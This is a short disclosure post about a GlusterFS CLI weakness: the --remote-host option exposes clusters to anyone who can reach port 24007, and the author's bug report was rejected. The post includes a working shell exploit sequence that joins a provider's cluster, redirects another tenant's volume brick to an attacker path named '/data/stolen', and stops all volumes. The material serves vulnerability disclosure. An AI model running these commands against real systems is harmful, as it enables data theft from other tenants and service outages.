I filed a bug back in July 2013 asserting that a “feature” in the gluster CLI was a potential security bug. I’ve recently had that bug rejected as “Not a bug” so here it is.

The CLI has an option, “–remote-host” that allows you to perform gluster CLI operations on remote hosts. This can easily be exploited:

# From host "myhost1.domain.dom", a SaaS client of provider.net
yum -y install glusterfs-server
systemctl start glusterd
gluster --remote-host=server1.gluster.provider.net peer probe myhost1.domain.dom
gluster volume info someone_elses_volume
gluster volume replace-brick someone_elses_volume \
    server1.gluster.provider.net:/gluster/brick1 \
    myhost1.domain.dom:/data/stolen commit force
gluster volume list | xargs -n1 gluster volume stop

Since all that is required is access to port 24007, the same port that’s needed to mount a volume, it can’t be blocked and, therefore, will leave your cluster open to abuse.